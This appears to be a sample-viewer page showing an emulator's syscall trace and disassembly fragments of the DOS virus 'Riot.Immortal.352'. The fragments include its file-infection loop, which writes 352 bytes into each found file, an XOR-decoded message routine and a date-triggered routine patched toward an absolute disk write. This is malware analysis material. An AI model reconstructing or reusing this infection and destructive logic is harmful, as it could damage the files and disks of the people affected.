Sample viewer

vx.netlux.org/Virus.DOS.Riot.Immortal.352

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:41.090982305Z 26 PC: 12a65 | Set disk transfer address
2018-12-17T22:57:41.092289832Z 53 PC: 12a6b | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:41.09470777Z 53 PC: 12a78 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:41.096703185Z 44 PC: 12a83 | Get time 0x12a83: cmp dl, 0xd
0x12a86: jg 0x12a8c
0x12a88: mov al, 0x82
0x12a8a: out 0x21, al
0x12a8c: mov ah, 0x2c
0x12a8e: int 0x21
0x12a90: cmp dl, 0x32
0x12a93: jg 0x12ad5
0x12a95: mov si, 0
0x12a98: xor byte ptr [bp + si + 0x173], 0x41
0x12a9d: cmp si, 0x11
0x12aa0: je 0x12aa5
0x12aa2: inc si
0x12aa3: jmp 0x12a98
0x12aa5: mov ah, 9
0x12aa7: lea dx, word ptr [bp + 0x173]
0x12aab: int 0x21
0x12aad: mov ah, 0
0x12aaf: int 0x16
0x12ab1: jmp 0x12ad5
2018-12-17T22:57:41.099846908Z 44 PC: 12a90 | Get time 0x12a90: cmp dl, 0x32
0x12a93: jg 0x12ad5
0x12a95: mov si, 0
0x12a98: xor byte ptr [bp + si + 0x173], 0x41
0x12a9d: cmp si, 0x11
0x12aa0: je 0x12aa5
0x12aa2: inc si
0x12aa3: jmp 0x12a98
0x12aa5: mov ah, 9
0x12aa7: lea dx, word ptr [bp + 0x173]
0x12aab: int 0x21
0x12aad: mov ah, 0
0x12aaf: int 0x16
0x12ab1: jmp 0x12ad5
0x12ab3: sub byte ptr [si], cl
0x12ab5: or al, 0x2e
0x12ab7: adc dx, word ptr [di]
0x12ab9: and byte ptr [di], cl
0x12abb: outsw dx, word ptr [si]
0x12abc: jb 0x12b32
2018-12-17T22:57:41.104686312Z 78 PC: 12aee | Find first file
2018-12-17T22:57:41.11203573Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.11997482Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.135324842Z 66 PC: 12b1b | Move file pointer
2018-12-17T22:57:41.136840209Z 64 PC: 12b2d | Write file or device (Write 352 bytes on handle 5)
2018-12-17T22:57:41.153346563Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:57:41.15503686Z 64 PC: 12b40 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:41.162637221Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.176467505Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.179371485Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.187556284Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.194414732Z 66 PC: 12b1b | Move file pointer
2018-12-17T22:57:41.196084842Z 64 PC: 12b2d | Write file or device (Write 352 bytes on handle 5)
2018-12-17T22:57:41.20091293Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:57:41.211918201Z 64 PC: 12b40 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:41.214222299Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.221859987Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.224092574Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.229068337Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.237616183Z 66 PC: 12b1b | Move file pointer
2018-12-17T22:57:41.239393588Z 64 PC: 12b2d | Write file or device (Write 352 bytes on handle 5)
2018-12-17T22:57:41.242541953Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:57:41.244537248Z 64 PC: 12b40 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:41.247773871Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.256727077Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.259587087Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.266852465Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.273812862Z 66 PC: 12b1b | Move file pointer
2018-12-17T22:57:41.275284273Z 64 PC: 12b2d | Write file or device (Write 352 bytes on handle 5)
2018-12-17T22:57:41.27877874Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:57:41.280720019Z 64 PC: 12b40 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:41.283946788Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.293248303Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.296311829Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.303475489Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.311367898Z 66 PC: 12b1b | Move file pointer
2018-12-17T22:57:41.313037196Z 64 PC: 12b2d | Write file or device (Write 352 bytes on handle 5)
2018-12-17T22:57:41.316173707Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:57:41.318232339Z 64 PC: 12b40 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:41.322037013Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.330351401Z 42 PC: 12b5e | Get date 0x12b5e: cmp dh, 0x11
0x12b61: jl 0x12b82
0x12b63: cmp dl, 8
0x12b66: jl 0x12b82
0x12b68: mov ah, 0x19
0x12b6a: int 0x21
0x12b6c: mov cx, 0x25
0x12b6f: mov dx, 0
0x12b72: lea bx, word ptr [bp + 0x173]
0x12b76: push ds
0x12b77: pop es
0x12b78: mov byte ptr [bp + 0x23e], 0x26
0x12b7d: int 0x19
0x12b7f: add sp, 2
0x12b82: mov ah, 0x1a
0x12b84: mov dx, 0x80
0x12b87: int 0x21
0x12b89: mov di, 0x100
0x12b8c: push di
0x12b8d: ret
2018-12-17T22:57:41.334018695Z 26 PC: 12b89 | Set disk transfer address
2018-12-17T22:57:41.335667866Z 26 PC: 12a65 | Set disk transfer address
2018-12-17T22:57:41.33688245Z 53 PC: 12a6b | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:41.338379712Z 53 PC: 12a78 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:41.34012062Z 44 PC: 12a83 | Get time 0x12a83: cmp dl, 0xd
0x12a86: jg 0x12a8c
0x12a88: mov al, 0x82
0x12a8a: out 0x21, al
0x12a8c: mov ah, 0x2c
0x12a8e: int 0x21
0x12a90: cmp dl, 0x32
0x12a93: jg 0x12ad5
0x12a95: mov si, 0
0x12a98: xor byte ptr [bp + si + 0x173], 0x41
0x12a9d: cmp si, 0x11
0x12aa0: je 0x12aa5
0x12aa2: inc si
0x12aa3: jmp 0x12a98
0x12aa5: mov ah, 9
0x12aa7: lea dx, word ptr [bp + 0x173]
0x12aab: int 0x21
0x12aad: mov ah, 0
0x12aaf: int 0x16
0x12ab1: jmp 0x12ad5
2018-12-17T22:57:41.342520806Z 44 PC: 12a90 | Get time 0x12a90: cmp dl, 0x32
0x12a93: jg 0x12ad5
0x12a95: mov si, 0
0x12a98: xor byte ptr [bp + si + 0x173], 0x41
0x12a9d: cmp si, 0x11
0x12aa0: je 0x12aa5
0x12aa2: inc si
0x12aa3: jmp 0x12a98
0x12aa5: mov ah, 9
0x12aa7: lea dx, word ptr [bp + 0x173]
0x12aab: int 0x21
0x12aad: mov ah, 0
0x12aaf: int 0x16
0x12ab1: jmp 0x12ad5
0x12ab3: sub byte ptr [si], cl
0x12ab5: or al, 0x2e
0x12ab7: adc dx, word ptr [di]
0x12ab9: and byte ptr [di], cl
0x12abb: outsw dx, word ptr [si]
0x12abc: jb 0x12b32
2018-12-17T22:57:41.34488128Z 78 PC: 12aee | Find first file
2018-12-17T22:57:41.351870673Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.359208025Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.362252884Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.36485025Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.36844156Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.375512407Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.380425287Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.382392062Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.385196463Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.393474235Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.396253494Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.398155451Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.401597558Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.408606136Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.411311065Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.413621884Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.429776574Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.436779008Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.439533184Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.44170296Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.444641465Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.452175444Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.459943746Z 66 PC: 12b1b | Move file pointer
2018-12-17T22:57:41.461401586Z 64 PC: 12b2d | Write file or device (Write 352 bytes on handle 5)
2018-12-17T22:57:41.470117069Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:57:41.472130786Z 64 PC: 12b40 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:41.47918478Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.488851218Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.492588373Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.500429742Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.50904988Z 66 PC: 12b1b | Move file pointer
2018-12-17T22:57:41.511749335Z 64 PC: 12b2d | Write file or device (Write 352 bytes on handle 5)
2018-12-17T22:57:41.514678635Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:57:41.516265959Z 64 PC: 12b40 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:41.519357356Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.528405911Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.531946798Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.540611961Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.545268948Z 66 PC: 12b1b | Move file pointer
2018-12-17T22:57:41.547296407Z 64 PC: 12b2d | Write file or device (Write 352 bytes on handle 5)
2018-12-17T22:57:41.556597552Z 66 PC: 12b35 | Move file pointer
2018-12-17T22:57:41.55899206Z 64 PC: 12b40 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:57:41.566087621Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.575481276Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.57898112Z 59 PC: 12b56 | Change current directory
2018-12-17T22:57:41.583535146Z 42 PC: 12b5e | Get date 0x12b5e: cmp dh, 0x11
0x12b61: jl 0x12b82
0x12b63: cmp dl, 8
0x12b66: jl 0x12b82
0x12b68: mov ah, 0x19
0x12b6a: int 0x21
0x12b6c: mov cx, 0x25
0x12b6f: mov dx, 0
0x12b72: lea bx, word ptr [bp + 0x173]
0x12b76: push ds
0x12b77: pop es
0x12b78: mov byte ptr [bp + 0x23e], 0x26
0x12b7d: int 0x19
0x12b7f: add sp, 2
0x12b82: mov ah, 0x1a
0x12b84: mov dx, 0x80
0x12b87: int 0x21
0x12b89: mov di, 0x100
0x12b8c: push di
0x12b8d: ret
2018-12-17T22:57:41.585945714Z 26 PC: 12b89 | Set disk transfer address
2018-12-17T22:57:41.587906279Z 26 PC: 12a65 | Set disk transfer address
2018-12-17T22:57:41.588997819Z 53 PC: 12a6b | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:41.59019392Z 53 PC: 12a78 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:41.592116243Z 44 PC: 12a83 | Get time 0x12a83: cmp dl, 0xd
0x12a86: jg 0x12a8c
0x12a88: mov al, 0x82
0x12a8a: out 0x21, al
0x12a8c: mov ah, 0x2c
0x12a8e: int 0x21
0x12a90: cmp dl, 0x32
0x12a93: jg 0x12ad5
0x12a95: mov si, 0
0x12a98: xor byte ptr [bp + si + 0x173], 0x41
0x12a9d: cmp si, 0x11
0x12aa0: je 0x12aa5
0x12aa2: inc si
0x12aa3: jmp 0x12a98
0x12aa5: mov ah, 9
0x12aa7: lea dx, word ptr [bp + 0x173]
0x12aab: int 0x21
0x12aad: mov ah, 0
0x12aaf: int 0x16
0x12ab1: jmp 0x12ad5
2018-12-17T22:57:41.594357307Z 44 PC: 12a90 | Get time 0x12a90: cmp dl, 0x32
0x12a93: jg 0x12ad5
0x12a95: mov si, 0
0x12a98: xor byte ptr [bp + si + 0x173], 0x41
0x12a9d: cmp si, 0x11
0x12aa0: je 0x12aa5
0x12aa2: inc si
0x12aa3: jmp 0x12a98
0x12aa5: mov ah, 9
0x12aa7: lea dx, word ptr [bp + 0x173]
0x12aab: int 0x21
0x12aad: mov ah, 0
0x12aaf: int 0x16
0x12ab1: jmp 0x12ad5
0x12ab3: sub byte ptr [si], cl
0x12ab5: or al, 0x2e
0x12ab7: adc dx, word ptr [di]
0x12ab9: and byte ptr [di], cl
0x12abb: outsw dx, word ptr [si]
0x12abc: jb 0x12b32
2018-12-17T22:57:41.596559397Z 78 PC: 12aee | Find first file
2018-12-17T22:57:41.603261895Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.610981014Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.613609425Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.615928616Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.618734699Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.625555027Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.628424123Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.630592059Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.633319855Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.640673489Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.644034908Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.646142322Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.648978409Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.656460797Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.659492394Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.661882388Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.66520803Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.673052843Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.676078103Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.678427842Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.681594231Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.689017909Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.692674539Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.694695251Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.697639894Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.705442832Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.708255111Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.710705191Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.714227466Z 61 PC: 12afe | Open file (Filename = '')
2018-12-17T22:57:41.72205418Z 63 PC: 12b0c | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:41.725229397Z 62 PC: 12b49 | Close file
2018-12-17T22:57:41.727813635Z 79 PC: 12aee | Find next file
2018-12-17T22:57:41.730963582Z 59 PC: 12b56 | Change current directory
2018-12-17T22:57:41.73595191Z 42 PC: 12b5e | Get date 0x12b5e: cmp dh, 0x11
0x12b61: jl 0x12b82
0x12b63: cmp dl, 8
0x12b66: jl 0x12b82
0x12b68: mov ah, 0x19
0x12b6a: int 0x21
0x12b6c: mov cx, 0x25
0x12b6f: mov dx, 0
0x12b72: lea bx, word ptr [bp + 0x173]
0x12b76: push ds
0x12b77: pop es
0x12b78: mov byte ptr [bp + 0x23e], 0x26
0x12b7d: int 0x19
0x12b7f: add sp, 2
0x12b82: mov ah, 0x1a
0x12b84: mov dx, 0x80
0x12b87: int 0x21
0x12b89: mov di, 0x100
0x12b8c: push di
0x12b8d: ret
2018-12-17T22:57:41.740483479Z 26 PC: 12b89 | Set disk transfer address
2018-12-17T22:57:41.742424992Z 26 PC: 12a65 | Set disk transfer address
2018-12-17T22:57:41.744117885Z 53 PC: 12a6b | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:57:41.746838366Z 53 PC: 12a78 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:57:41.748582301Z 44 PC: 12a83 | Get time 0x12a83: cmp dl, 0xd
0x12a86: jg 0x12a8c
0x12a88: mov al, 0x82
0x12a8a: out 0x21, al
0x12a8c: mov ah, 0x2c
0x12a8e: int 0x21
0x12a90: cmp dl, 0x32
0x12a93: jg 0x12ad5
0x12a95: mov si, 0
0x12a98: xor byte ptr [bp + si + 0x173], 0x41
0x12a9d: cmp si, 0x11
0x12aa0: je 0x12aa5
0x12aa2: inc si
0x12aa3: jmp 0x12a98
0x12aa5: mov ah, 9
0x12aa7: lea dx, word ptr [bp + 0x173]
0x12aab: int 0x21
0x12aad: mov ah, 0
0x12aaf: int 0x16
0x12ab1: jmp 0x12ad5
2018-12-17T22:57:41.751407276Z 44 PC: 12a90 | Get time 0x12a90: cmp dl, 0x32
0x12a93: jg 0x12ad5
0x12a95: mov si, 0
0x12a98: xor byte ptr [bp + si + 0x173], 0x41
0x12a9d: cmp si, 0x11
0x12aa0: je 0x12aa5
0x12aa2: inc si
0x12aa3: jmp 0x12a98
0x12aa5: mov ah, 9
0x12aa7: lea dx, word ptr [bp + 0x173]
0x12aab: int 0x21
0x12aad: mov ah, 0
0x12aaf: int 0x16
0x12ab1: jmp 0x12ad5
0x12ab3: sub byte ptr [si], cl
0x12ab5: or al, 0x2e
0x12ab7: adc dx, word ptr [di]
0x12ab9: and byte ptr [di], cl
0x12abb: outsw dx, word ptr [si]
0x12abc: jb 0x12b32
2018-12-17T22:57:41.755265239Z 9 PC: 12aad | Display string (Could not find end pointer)